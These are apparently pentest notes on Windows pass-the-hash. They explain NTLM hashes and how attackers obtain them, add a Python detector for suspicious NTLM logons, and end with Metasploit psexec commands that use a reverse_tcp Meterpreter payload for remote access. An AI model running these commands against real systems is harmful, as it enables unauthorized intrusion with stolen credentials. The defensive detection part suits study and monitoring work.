General
Pass-the-hash (PtH) is a technique that allows an attacker to authenticate to a remote system using the underlying NTLM or LAN Manager (LM) hash of a user's password, instead of the actual password. This can allow an attacker to gain access to a system or network without knowing the actual password of the user.
On a Windows system, user passwords are stored in a hashed format in the system's local security database, called the Security Account Manager (SAM). When a user enters their password, the system hashes the entered password and compares it to the stored hash to authenticate the user.
In a PtH attack, the attacker obtains the hash of a user's password and uses it to authenticate to a system as that user. This can be done by capturing the hash through a variety of means, such as through a network sniffer, by extracting it from a compromised system, or by using a tool like Mimikatz. Once the attacker has the hash, they can use it to authenticate to a system without knowing the actual password.
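From the defender's side, the NTLM network logons described above are what a PtH attempt looks like in the Security log. The following is an added example, not part of the original notes: it flags NTLM network logons (event 4624, logon type 3) whose source does not match a per-account baseline. The field names follow Windows event 4624; the records, the baseline and the "unexpected source" heuristic are constructed assumptions to tune per environment.

```python
# Added example (not from the original notes): flag NTLM network logons that do not
# match a per-account source baseline, a common starting point for spotting PtH.
# Field names follow Windows Security event 4624; the records and baseline below are
# constructed, and the "unexpected source" heuristic is an assumption to tune per site.
from collections import Counter

EVENTS = [  # constructed sample 4624 records
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "alice", "IpAddress": "10.0.0.20"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "svc_backup", "IpAddress": "10.0.0.77"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "ANONYMOUS LOGON", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "FILE01$", "IpAddress": "10.0.0.5"},
]
# Constructed baseline: source addresses each account is normally seen from.
KNOWN_SOURCES = {"svc_backup": {"10.0.0.50"}, "alice": {"10.0.0.20"}}


def is_ntlm_network_logon(ev):
    """Successful network logon (type 3) that negotiated NTLM rather than Kerberos."""
    return (ev.get("EventID") == 4624 and ev.get("LogonType") == 3
            and str(ev.get("AuthenticationPackageName", "")).upper() == "NTLM")


def flag_suspicious(events, known_sources):
    """Return (account, source_ip) for NTLM network logons from hosts outside the baseline.
    Machine accounts (trailing '$') and ANONYMOUS LOGON are skipped as noise."""
    hits = []
    for ev in events:
        if not is_ntlm_network_logon(ev):
            continue
        user = ev["TargetUserName"]
        if user.endswith("$") or user.upper() == "ANONYMOUS LOGON":
            continue
        src = ev.get("IpAddress", "")
        if src not in known_sources.get(user, set()):
            hits.append((user, src))
    return hits


def ntlm_share(events):
    """Fraction of network logons that used NTLM; a jump in a Kerberos-first estate is a lead."""
    pkgs = Counter(ev["AuthenticationPackageName"] for ev in events if ev.get("LogonType") == 3)
    total = sum(pkgs.values())
    return pkgs["NTLM"] / total if total else 0.0


if __name__ == "__main__":
    print(flag_suspicious(EVENTS, KNOWN_SOURCES), round(ntlm_share(EVENTS), 2))
```

In practice the baseline would be learned from weeks of 4624 data rather than hard-coded, and hosts that legitimately cannot use Kerberos (non-domain-joined or reached by IP address) need an allow-list to keep the alert volume down.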
Commands
Make sure you have gathered a hash before starting this step and also have a Meterpreter session.
PtH Module
use windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
show options    (then set the options: RHOST, RPORT, SMB domain, user and password or hash)
run